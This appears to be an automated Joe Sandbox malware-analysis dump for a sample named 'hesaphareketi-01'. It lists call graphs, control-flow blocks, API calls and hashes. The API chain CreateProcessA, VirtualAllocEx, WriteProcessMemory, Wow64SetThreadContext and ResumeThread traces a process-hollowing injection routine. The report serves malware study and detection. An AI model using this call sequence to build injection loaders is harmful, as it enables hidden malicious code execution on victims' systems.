36104->36209 36222 6f6c034 36104->36222 36113->36100 36120 6f6b912 36119->36120 36121 6f6b936 36120->36121 36122 6f6c517 2 API calls 36120->36122 36123 6f6c034 2 API calls 36120->36123 36124 6f6bdf4 6 API calls 36120->36124 36125 6f6c492 2 API calls 36120->36125 36126 6f6bdd3 2 API calls 36120->36126 36127 6f6bf71 2 API calls 36120->36127 36128 6f6c11e 2 API calls 36120->36128 36129 6f6be79 4 API calls 36120->36129 36130 6f6bf23 2 API calls 36120->36130 36131 6f6bcef 2 API calls 36120->36131 36132 6f6c22a 6 API calls 36120->36132 36133 6f6c0cb 4 API calls 36120->36133 36134 6f6bd88 4 API calls 36120->36134 36121->36100 36122->36121 36123->36121 36124->36121 36125->36121 36126->36121 36127->36121 36128->36121 36129->36121 36130->36121 36131->36121 36132->36121 36133->36121 36134->36121 36136 6f6c4ce 36135->36136 36136->36113 36227 6f69910 36136->36227 36231 6f6990a 36136->36231 36137 6f6c6f8 36141 6f6bd7e 36140->36141 36142 6f6c42c 36141->36142 36143 6f6bd90 36141->36143 36235 6f69e20 36141->36235 36239 6f69e18 36141->36239 36143->36113 36147 6f69910 Wow64SetThreadContext 36143->36147 36148 6f6990a Wow64SetThreadContext 36143->36148 36144 6f6c6f8 36147->36144 36148->36144 36150 6f6bd7e 36149->36150 36150->36149 36151 6f6c42c 36150->36151 36152 6f6bd90 36150->36152 36154 6f69e20 VirtualAllocEx 36150->36154 36155 6f69e18 VirtualAllocEx 36150->36155 36152->36113 36156 6f69910 Wow64SetThreadContext 36152->36156 36157 6f6990a Wow64SetThreadContext 36152->36157 36153 6f6c6f8 36154->36150 36155->36150 36156->36153 36157->36153 36159 6f6c237 36158->36159 36160 6f6be0b 36158->36160 36160->36158 36161 6f6bd7e 36160->36161 36243 6f69ee0 36160->36243 36247 6f69ed8 36160->36247 36162 6f6bd90 36161->36162 36164 6f6c42c 36161->36164 36167 6f69e20 VirtualAllocEx 36161->36167 36168 6f69e18 VirtualAllocEx 36161->36168 36162->36113 36165 6f69910 Wow64SetThreadContext 36162->36165 36166 6f6990a Wow64SetThreadContext 36162->36166 36163 6f6c6f8 36165->36163 36166->36163 36167->36161 36168->36161 36251 6f6a55c 36171->36251 36255 6f6a568 36171->36255 36177 6f69ee0 WriteProcessMemory 36175->36177 36178 6f69ed8 WriteProcessMemory 36175->36178 36176 6f6bf51 36176->36113 36177->36176 36178->36176 36181 6f6bd7e 36179->36181 36180 6f6bd90 36180->36113 36184 6f69910 Wow64SetThreadContext 36180->36184 36185 6f6990a Wow64SetThreadContext 36180->36185 36181->36180 36183 6f6c42c 36181->36183 36186 6f69e20 VirtualAllocEx 36181->36186 36187 6f69e18 VirtualAllocEx 36181->36187 36182 6f6c6f8 36182->36182 36184->36182 36185->36182 36186->36181 36187->36181 36189 6f6c04b 36188->36189 36190 6f6c12b 36188->36190 36259 6f69420 36189->36259 36263 6f69428 36189->36263 36191 6f6c060 36195 6f6c2c6 36194->36195 36197 6f69910 Wow64SetThreadContext 36195->36197 36198 6f6990a Wow64SetThreadContext 36195->36198 36196 6f6c2e1 36197->36196 36198->36196 36200 6f6bddc 36199->36200 36202 6f69ee0 WriteProcessMemory 36200->36202 36203 6f69ed8 WriteProcessMemory 36200->36203 36201 6f6c1cd 36202->36201 36203->36201 36205 6f6c4ce 36204->36205 36205->36113 36207 6f69910 Wow64SetThreadContext 36205->36207 36208 6f6990a Wow64SetThreadContext 36205->36208 36206 6f6c6f8 36207->36206 36208->36206 36210 6f6bdfa 36209->36210 36212 6f6bd7e 36210->36212 36213 6f6c237 36210->36213 36220 6f69ee0 WriteProcessMemory 36210->36220 36221 6f69ed8 WriteProcessMemory 36210->36221 36211 6f6bd90 36211->36113 36216 6f69910 Wow64SetThreadContext 36211->36216 36217 6f6990a Wow64SetThreadContext 36211->36217 36212->36211 36215 6f6c42c 36212->36215 36218 6f69e20 VirtualAllocEx 36212->36218 36219 6f69e18 VirtualAllocEx 36212->36219 36214 6f6c6f8 36216->36214 36217->36214 36218->36212 36219->36212 36220->36210 36221->36210 36223 6f6c03a 36222->36223 36225 6f69420 ResumeThread 36223->36225 36226 6f69428 ResumeThread 36223->36226 36224 6f6c060 36225->36224 36226->36224 36228 6f69955 Wow64SetThreadContext 36227->36228 36230 6f6999d 36228->36230 36230->36137 36232 6f69955 Wow64SetThreadContext 36231->36232 36234 6f6999d 36232->36234 36234->36137 36236 6f69e60 VirtualAllocEx 36235->36236 36238 6f69e9d 36236->36238 36238->36141 36240 6f69e60 VirtualAllocEx 36239->36240 36242 6f69e9d 36240->36242 36242->36141 36244 6f69f28 WriteProcessMemory 36243->36244 36246 6f69f7f 36244->36246 36246->36160 36248 6f69ee0 WriteProcessMemory 36247->36248 36250 6f69f7f 36248->36250 36250->36160 36252 6f6a568 CreateProcessA 36251->36252 36254 6f6a7b3 36252->36254 36254->36254 36256 6f6a5f1 CreateProcessA 36255->36256 36258 6f6a7b3 36256->36258 36260 6f69468 ResumeThread 36259->36260 36262 6f69499 36260->36262 36262->36191 36264 6f69468 ResumeThread 36263->36264 36266 6f69499 36264->36266 36266->36191 36267 2d16fe8 36268 2d17015 36267->36268 36279 2d16d24 36268->36279 36270 2d17085 36271 2d16d24 3 API calls 36270->36271 36272 2d170b7 36271->36272 36284 2d16d34 36272->36284 36275 2d16d34 3 API calls 36276 2d1711b 36275->36276 36288 2d16d44 36276->36288 36278 2d1714d 36280 2d16d2f 36279->36280 36282 1335cc4 3 API calls 36280->36282 36292 1338328 36280->36292 36281 2d17fdb 36281->36270 36282->36281 36285 2d16d3f 36284->36285 36301 2d16f44 36285->36301 36287 2d170e9 36287->36275 36289 2d16d4f 36288->36289 36306 2d1ec80 36289->36306 36291 2d1fb77 36291->36278 36293 133832b 36292->36293 36294 13382f1 36292->36294 36295 1338390 36293->36295 36300 1338638 3 API calls 36293->36300 36294->36281 36297 13385eb 36295->36297 36298 133ac98 GetModuleHandleW 36295->36298 36296 1338629 36296->36281 36297->36296 36299 133cd9c 3 API calls 36297->36299 36298->36297 36299->36296 36300->36295 36302 2d16f49 36301->36302 36303 2d18e82 36302->36303 36304 1335cc4 3 API calls 36302->36304 36305 1338328 3 API calls 36302->36305 36303->36287 36304->36303 36305->36303 36307 2d1ec8b 36306->36307 36309 1335cc4 3 API calls 36307->36309 36310 1338328 3 API calls 36307->36310 36308 2d1fbfc 36308->36291 36309->36308 36310->36308 35995 1334668 35996 133467a 35995->35996 35997 1334686 35996->35997 36001 1334778 35996->36001 36006 1333e28 35997->36006 35999 13346a5 36002 133479d 36001->36002 36010 1334878 36002->36010 36014 1334888 36002->36014 36003 13347a7 36003->35997 36007 1333e33 36006->36007 36022 1335c44 36007->36022 36009 133705c 36009->35999 36012 13348af 36010->36012 36011 133498c 36011->36003 36012->36011 36018 13344b0 36012->36018 36016 13348af 36014->36016 36015 133498c 36015->36003 36016->36015 36017 13344b0 CreateActCtxA 36016->36017 36017->36015 36019 1335918 CreateActCtxA 36018->36019 36021 13359db 36019->36021 36023 1335c4f 36022->36023 36026 1335c64 36023->36026 36025 1337105 36025->36009 36027 1335c6f 36026->36027 36030 1335c94 36027->36030 36029 13371e2 36029->36025 36031 1335c9f 36030->36031 36034 1335cc4 36031->36034 36033 13372e5 36033->36029 36035 1335ccf 36034->36035 36036 1338390 36035->36036 36042 1338638 36035->36042 36038 13385eb 36036->36038 36047 133ac98 36036->36047 36037 1338629 36037->36033 36038->36037 36051 133cd9c 36038->36051 36043 133860e 36042->36043 36045 1338647 36042->36045 36044 1338629 36043->36044 36046 133cd9c 3 API calls 36043->36046 36044->36036 36045->36036 36046->36044 36055 133acd0 36047->36055 36058 133acc0 36047->36058 36048 133acae 36048->36038 36052 133cdb9 36051->36052 36053 133cddd 36052->36053 36067 133cf48 36052->36067 36053->36037 36062 133adc8 36055->36062 36056 133acdf 36056->36048 36059 133acd0 36058->36059 36061 133adc8 GetModuleHandleW 36059->36061 36060 133acdf 36060->36048 36061->36060 36063 133adfc 36062->36063 36064 133add9 36062->36064 36063->36056 36064->36063 36065 133b000 GetModuleHandleW 36064->36065 36066 133b02d 36065->36066 36066->36056 36069 133cf55 36067->36069 36068 133cf8f 36068->36053 36069->36068 36071 133bb00 36069->36071 36072 133bb0b 36071->36072 36074 133dca8 36072->36074 36075 133d2fc 36072->36075 36074->36074 36076 133d307 36075->36076 36077 1335cc4 3 API calls 36076->36077 36078 133dd17 36077->36078 36082 133fa90 36078->36082 36088 133faa8 36078->36088 36079 133dd51 36079->36074 36084 133fad9 36082->36084 36085 133fbd9 36082->36085 36083 133fae5 36083->36079 36084->36083 36086 2d109c0 CreateWindowExW CreateWindowExW 36084->36086 36087 2d109b0 CreateWindowExW CreateWindowExW 36084->36087 36085->36079 36086->36085 36087->36085 36090 133fad9 36088->36090 36091 133fbd9 36088->36091 36089 133fae5 36089->36079 36090->36089 36092 2d109c0 CreateWindowExW CreateWindowExW 36090->36092 36093 2d109b0 CreateWindowExW CreateWindowExW 36090->36093 36091->36079 36092->36091 36093->36091 36311 6f6ca88 36312 6f6cc13 36311->36312 36314 6f6caae 36311->36314 36314->36312 36315 6f6a120 36314->36315 36316 6f6cd08 PostMessageW 36315->36316 36317 6f6cd74 36316->36317 36317->36314

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 44 2d16fd8-2d17013 45 2d17015 44->45 46 2d1701a-2d1706a 44->46 45->46 51 2d17074-2d17080 call 2d16d24 46->51 53 2d17085-2d17132 call 2d16d24 call 2d16d34 * 2 51->53 67 2d1713c-2d17148 call 2d16d44 53->67 69 2d1714d-2d17164 67->69 71 2d1716f-2d17183 69->71 256 2d17186 call 2d1fe98 71->256 257 2d17186 call 2d1fea8 71->257 72 2d17189-2d1718a 73 2d17194-2d171e0 call 2d16d54 72->73 76 2d171e6-2d17240 73->76 79 2d1724b-2d17262 call 2d16d64 76->79 81 2d17267-2d174a0 call 2d16d74 call 2d16d84 call 2d16d94 call 2d16d54 call 2d16d64 call 2d16d74 call 2d16d84 call 2d16d94 79->81 108 2d174ab-2d174c1 81->108 109 2d174c7-2d17550 call 2d16da4 call 2d16d54 108->109 116 2d1755c-2d1757b 109->116 118 2d17582-2d175dd 116->118 122 2d175e4-2d17609 118->122 124 2d1760f-2d1761f 122->124 125 2d17621 124->125 126 2d17626-2d17646 124->126 125->126 128 2d17648 126->128 129 2d1764d-2d17695 call 2d16db4 126->129 128->129 132 2d1769a-2d176b8 129->132 133 2d176bf-2d17ed8 call 2d16d64 call 2d16d74 call 2d16d84 call 2d16d94 call 2d16dc4 call 2d16da4 call 2d16d54 call 2d16d64 call 2d16d74 call 2d16dd4 call 2d16d84 call 2d16d94 call 2d16de4 call 2d16df4 call 2d16e04 call 2d16d54 call 2d16d64 call 2d16d74 call 2d16d84 call 2d16d94 call 2d16e14 call 2d16e24 call 2d16e34 call 2d16e44 call 2d16e54 call 2d16e64 call 2d16e74 * 5 call 2d16e84 132->133 236 2d17f02 133->236 237 2d17eda-2d17ee6 133->237 238 2d17f08-2d17f97 call 2d16e94 call 2d16ea4 call 2d16d74 call 2d16eb4 call 2d16ec4 call 2d16ed4 236->238 239 2d17ef0-2d17ef6 237->239 240 2d17ee8-2d17eee 237->240 242 2d17f00 239->242 240->242 242->238 256->72 257->72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $'q
                                          • API String ID: 0-3923516549
                                          • Opcode ID: e7ff9438fb8fab251447843033bcd9a2d6aa459eca7f39f222c90d8866f29cdf
                                          • Instruction ID: 1f3a16cee0b2be0f5a950ab8c58d683362f405ac75f38335466252eda948f2db
                                          • Opcode Fuzzy Hash: e7ff9438fb8fab251447843033bcd9a2d6aa459eca7f39f222c90d8866f29cdf
                                          • Instruction Fuzzy Hash: CEA2D534A11219DFDB15DF64C898AD9B7B2FF8A301F1181E9E509AB361DB31AE85CF40

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $'q
                                          • API String ID: 0-3923516549
                                          • Opcode ID: cb2e7da288742bb16f2542bfd8a11519b29ef9dde645a2f1f1f29f65d12a335d
                                          • Instruction ID: 9e93df775e122603684499da57d3a0bf5b13d18d9da48090600b218f9508ca3f
                                          • Opcode Fuzzy Hash: cb2e7da288742bb16f2542bfd8a11519b29ef9dde645a2f1f1f29f65d12a335d
                                          • Instruction Fuzzy Hash: FFA2D434A11219DFDB25DF64C898AD9B7B2FF89301F1181E9E509AB361DB31AE85CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 886ecd6123d39b99703b98e003a16ec590b6672c4f4189caa66d6d723e68f42e
                                          • Instruction ID: 42da9f2fcdc173c55ff523c434a15c65b874e601204fe4b8cac3aced7ed2cb85
                                          • Opcode Fuzzy Hash: 886ecd6123d39b99703b98e003a16ec590b6672c4f4189caa66d6d723e68f42e
                                          • Instruction Fuzzy Hash: AA410671D042198BEB44DFAAC8447EEFBF6BF89300F14C556E408BB254DB706985CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07860af62882db6feb3cd35bbe5e7bf9de16823b1e6bc247298bcc85fa7a6afb
                                          • Instruction ID: 94fa24ebfcca68b55ae2a6693604d1bd05fa5bde6c3886997f379fac1dc90116
                                          • Opcode Fuzzy Hash: 07860af62882db6feb3cd35bbe5e7bf9de16823b1e6bc247298bcc85fa7a6afb
                                          • Instruction Fuzzy Hash: 5A21AFB1D046189BEB58CFABD94479EFAF7AFC9300F14C06AD408B6264DB75094A8F90

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0133D0DE
                                          • GetCurrentThread.KERNEL32 ref: 0133D11B
                                          • GetCurrentProcess.KERNEL32 ref: 0133D158
                                          • GetCurrentThreadId.KERNEL32 ref: 0133D1B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 18bc46afe6110766856d8d1ab3a8f0c9a961ec20a1875b4b9e3d9f00b66e600e
                                          • Instruction ID: 3a65074a49b928dcf7440cf52b4d9c0705248a7a09ed797081c43a697d97928a
                                          • Opcode Fuzzy Hash: 18bc46afe6110766856d8d1ab3a8f0c9a961ec20a1875b4b9e3d9f00b66e600e
                                          • Instruction Fuzzy Hash: CC5156B0D007498FDB54CFAAD948BEEBBF1AF88314F24855AE009A7350D7749948CF65

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0133D0DE
                                          • GetCurrentThread.KERNEL32 ref: 0133D11B
                                          • GetCurrentProcess.KERNEL32 ref: 0133D158
                                          • GetCurrentThreadId.KERNEL32 ref: 0133D1B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: ae80e108ac183a1aba35e2881de809331ecf4f98667f3e34b120ace2dfeb01f8
                                          • Instruction ID: c18ae10c783735a630357b351bc0c5b641ef99dfc6446310e50492d280d8b442
                                          • Opcode Fuzzy Hash: ae80e108ac183a1aba35e2881de809331ecf4f98667f3e34b120ace2dfeb01f8
                                          • Instruction Fuzzy Hash: 395145B0D007498FDB54CFAAD948BDEBBF1AF88314F208559E019A7350D7749948CF69

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 472 2d11790-2d11799 473 2d11761-2d11780 472->473 474 2d1179b-2d1179e 472->474 476 2d117a1-2d117b8 474->476 477 2d117b9 476->477 478 2d11781-2d1178f 477->478 479 2d117bb-2d117bd 477->479 478->472 480 2d117c1-2d117d9 479->480 480->476 481 2d117db-2d117de 480->481 482 2d117e1-2d117f0 481->482 482->477 483 2d117f3-2d117f9 482->483 483->480 484 2d117fb-2d11819 483->484 484->482 485 2d1181b-2d118a4 484->485 486 2d118a6-2d118cd 485->486 487 2d118de-2d11956 485->487 502 2d118d0 call 2d11790 486->502 503 2d118d0 call 2d118f0 486->503 488 2d11961-2d11968 487->488 489 2d11958-2d1195e 487->489 491 2d11973-2d119ab 488->491 492 2d1196a-2d11970 488->492 489->488 490 2d118d5-2d118d6 493 2d119b3-2d11a12 CreateWindowExW 491->493 492->491 494 2d11a14-2d11a1a 493->494 495 2d11a1b-2d11a53 493->495 494->495 499 2d11a60 495->499 500 2d11a55-2d11a58 495->500 501 2d11a61 499->501 500->499 501->501 502->490 503->490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67a1c4881a546640fae4e613320a2b562d67d194af09a66ee2f0c13b0d038aa0
                                          • Instruction ID: a6cc6ea5e830f15ab02dc56f541e8431f2c6884143f0f5472c148ecb0484b068
                                          • Opcode Fuzzy Hash: 67a1c4881a546640fae4e613320a2b562d67d194af09a66ee2f0c13b0d038aa0
                                          • Instruction Fuzzy Hash: 5EA17DB5C093899FDB02CFA5D8546CDBFB1EF5A300F19819AE588AB262D3709846CF51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 504 6f6a55c-6f6a5fd 507 6f6a636-6f6a656 504->507 508 6f6a5ff-6f6a609 504->508 513 6f6a68f-6f6a6be 507->513 514 6f6a658-6f6a662 507->514 508->507 509 6f6a60b-6f6a60d 508->509 511 6f6a630-6f6a633 509->511 512 6f6a60f-6f6a619 509->512 511->507 515 6f6a61d-6f6a62c 512->515 516 6f6a61b 512->516 522 6f6a6f7-6f6a7b1 CreateProcessA 513->522 523 6f6a6c0-6f6a6ca 513->523 514->513 518 6f6a664-6f6a666 514->518 515->515 517 6f6a62e 515->517 516->515 517->511 519 6f6a668-6f6a672 518->519 520 6f6a689-6f6a68c 518->520 524 6f6a676-6f6a685 519->524 525 6f6a674 519->525 520->513 536 6f6a7b3-6f6a7b9 522->536 537 6f6a7ba-6f6a840 522->537 523->522 526 6f6a6cc-6f6a6ce 523->526 524->524 527 6f6a687 524->527 525->524 528 6f6a6d0-6f6a6da 526->528 529 6f6a6f1-6f6a6f4 526->529 527->520 531 6f6a6de-6f6a6ed 528->531 532 6f6a6dc 528->532 529->522 531->531 533 6f6a6ef 531->533 532->531 533->529 536->537 547 6f6a842-6f6a846 537->547 548 6f6a850-6f6a854 537->548 547->548 549 6f6a848 547->549 550 6f6a856-6f6a85a 548->550 551 6f6a864-6f6a868 548->551 549->548 550->551 552 6f6a85c 550->552 553 6f6a86a-6f6a86e 551->553 554 6f6a878-6f6a87c 551->554 552->551 553->554 555 6f6a870 553->555 556 6f6a88e-6f6a895 554->556 557 6f6a87e-6f6a884 554->557 555->554 558 6f6a897-6f6a8a6 556->558 559 6f6a8ac 556->559 557->556 558->559 561 6f6a8ad 559->561 561->561
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F6A79E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 7386423b45cbbf0f67c92ed558eee4fb44dd8a498a6397134b094a3951183a21
                                          • Instruction ID: c0d9941be6697bd4c5ae3a551493c88544cb1af51ee2389b5b28f9587d7170fb
                                          • Opcode Fuzzy Hash: 7386423b45cbbf0f67c92ed558eee4fb44dd8a498a6397134b094a3951183a21
                                          • Instruction Fuzzy Hash: 1FA16A71D002599FEF50CFA9C8417EEBBB2BF49304F1485A9E808B7290DB759986CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 562 6f6a568-6f6a5fd 564 6f6a636-6f6a656 562->564 565 6f6a5ff-6f6a609 562->565 570 6f6a68f-6f6a6be 564->570 571 6f6a658-6f6a662 564->571 565->564 566 6f6a60b-6f6a60d 565->566 568 6f6a630-6f6a633 566->568 569 6f6a60f-6f6a619 566->569 568->564 572 6f6a61d-6f6a62c 569->572 573 6f6a61b 569->573 579 6f6a6f7-6f6a7b1 CreateProcessA 570->579 580 6f6a6c0-6f6a6ca 570->580 571->570 575 6f6a664-6f6a666 571->575 572->572 574 6f6a62e 572->574 573->572 574->568 576 6f6a668-6f6a672 575->576 577 6f6a689-6f6a68c 575->577 581 6f6a676-6f6a685 576->581 582 6f6a674 576->582 577->570 593 6f6a7b3-6f6a7b9 579->593 594 6f6a7ba-6f6a840 579->594 580->579 583 6f6a6cc-6f6a6ce 580->583 581->581 584 6f6a687 581->584 582->581 585 6f6a6d0-6f6a6da 583->585 586 6f6a6f1-6f6a6f4 583->586 584->577 588 6f6a6de-6f6a6ed 585->588 589 6f6a6dc 585->589 586->579 588->588 590 6f6a6ef 588->590 589->588 590->586 593->594 604 6f6a842-6f6a846 594->604 605 6f6a850-6f6a854 594->605 604->605 606 6f6a848 604->606 607 6f6a856-6f6a85a 605->607 608 6f6a864-6f6a868 605->608 606->605 607->608 609 6f6a85c 607->609 610 6f6a86a-6f6a86e 608->610 611 6f6a878-6f6a87c 608->611 609->608 610->611 612 6f6a870 610->612 613 6f6a88e-6f6a895 611->613 614 6f6a87e-6f6a884 611->614 612->611 615 6f6a897-6f6a8a6 613->615 616 6f6a8ac 613->616 614->613 615->616 618 6f6a8ad 616->618 618->618
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F6A79E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 4f830672dce493bdb2e31d7d2bcef6657ed472823ef11bba23eb9f4a4e3dbe16
                                          • Instruction ID: 8ebedd2d3a60aa8bbe7b0b88acbe9d7ecea19d3b0167675fe27d2a9ecbccf1f8
                                          • Opcode Fuzzy Hash: 4f830672dce493bdb2e31d7d2bcef6657ed472823ef11bba23eb9f4a4e3dbe16
                                          • Instruction Fuzzy Hash: C1916A71D002599FEF50CFA9C8407EEBBB2BF49314F1485A9E808B7290DB759985CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 619 133adc8-133add7 620 133ae03-133ae07 619->620 621 133add9-133ade6 call 133a0ec 619->621 622 133ae1b-133ae5c 620->622 623 133ae09-133ae13 620->623 628 133ade8 621->628 629 133adfc 621->629 630 133ae69-133ae77 622->630 631 133ae5e-133ae66 622->631 623->622 674 133adee call 133b060 628->674 675 133adee call 133b050 628->675 629->620 632 133ae9b-133ae9d 630->632 633 133ae79-133ae7e 630->633 631->630 636 133aea0-133aea7 632->636 637 133ae80-133ae87 call 133a0f8 633->637 638 133ae89 633->638 634 133adf4-133adf6 634->629 635 133af38-133aff8 634->635 669 133b000-133b02b GetModuleHandleW 635->669 670 133affa-133affd 635->670 640 133aeb4-133aebb 636->640 641 133aea9-133aeb1 636->641 639 133ae8b-133ae99 637->639 638->639 639->636 643 133aec8-133aeca call 133a108 640->643 644 133aebd-133aec5 640->644 641->640 648 133aecf-133aed1 643->648 644->643 650 133aed3-133aedb 648->650 651 133aede-133aee3 648->651 650->651 652 133af01-133af0e 651->652 653 133aee5-133aeec 651->653 659 133af31-133af37 652->659 660 133af10-133af2e 652->660 653->652 655 133aeee-133aefe call 133a118 call 133a128 653->655 655->652 660->659 671 133b034-133b048 669->671 672 133b02d-133b033 669->672 670->669 672->671 674->634 675->634
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B01E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: e6a46f8b25b4fc76bde6dcf1dd5f6eb3b1757f9683fabc082f3b0be59114bd3b
                                          • Instruction ID: f4d7a582c1524da0a6517f79f758775df234fe986aeb6876ed519f62831c3b18
                                          • Opcode Fuzzy Hash: e6a46f8b25b4fc76bde6dcf1dd5f6eb3b1757f9683fabc082f3b0be59114bd3b
                                          • Instruction Fuzzy Hash: AF814670A00B058FEB24DF2AD45479ABBF1FF88204F008A2DD08ADBA50D775E849CF95

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 676 2d118f0-2d11956 677 2d11961-2d11968 676->677 678 2d11958-2d1195e 676->678 679 2d11973-2d11a12 CreateWindowExW 677->679 680 2d1196a-2d11970 677->680 678->677 682 2d11a14-2d11a1a 679->682 683 2d11a1b-2d11a53 679->683 680->679 682->683 687 2d11a60 683->687 688 2d11a55-2d11a58 683->688 689 2d11a61 687->689 688->687 689->689
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D11A02
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 797c33b3ffcbee4d10a0a90b71c057a813de5a179e5bf6824365dbecddc0a084
                                          • Instruction ID: 03367d21d8e676f6723e93b9d3099e2175032083773b191d4978b993d6cce52c
                                          • Opcode Fuzzy Hash: 797c33b3ffcbee4d10a0a90b71c057a813de5a179e5bf6824365dbecddc0a084
                                          • Instruction Fuzzy Hash: 5E41CEB1D04349AFDB14CF9AD884ADEBFB5BF48310F24812AE819AB250D7709985CF94

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 690 13344b0-13359d9 CreateActCtxA 693 13359e2-1335a3c 690->693 694 13359db-13359e1 690->694 701 1335a4b-1335a4f 693->701 702 1335a3e-1335a41 693->702 694->693 703 1335a51-1335a5d 701->703 704 1335a60 701->704 702->701 703->704 706 1335a61 704->706 706->706
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 2c25eea2dc8ea7f59473c8bd3e858402cd616c30809533daff9bdade38bde2b0
                                          • Instruction ID: 4de9666668edf8e8288952bdcbbc54433a3e910ded88e92538ab69291eece8a4
                                          • Opcode Fuzzy Hash: 2c25eea2dc8ea7f59473c8bd3e858402cd616c30809533daff9bdade38bde2b0
                                          • Instruction Fuzzy Hash: B241B2B0C0071DCBEB24CFAAC844BDEBBB5BF49704F20806AD409AB251D7B55945CF94

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 707 133590c-1335912 708 133591c-13359d9 CreateActCtxA 707->708 710 13359e2-1335a3c 708->710 711 13359db-13359e1 708->711 718 1335a4b-1335a4f 710->718 719 1335a3e-1335a41 710->719 711->710 720 1335a51-1335a5d 718->720 721 1335a60 718->721 719->718 720->721 723 1335a61 721->723 723->723
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 013359C9
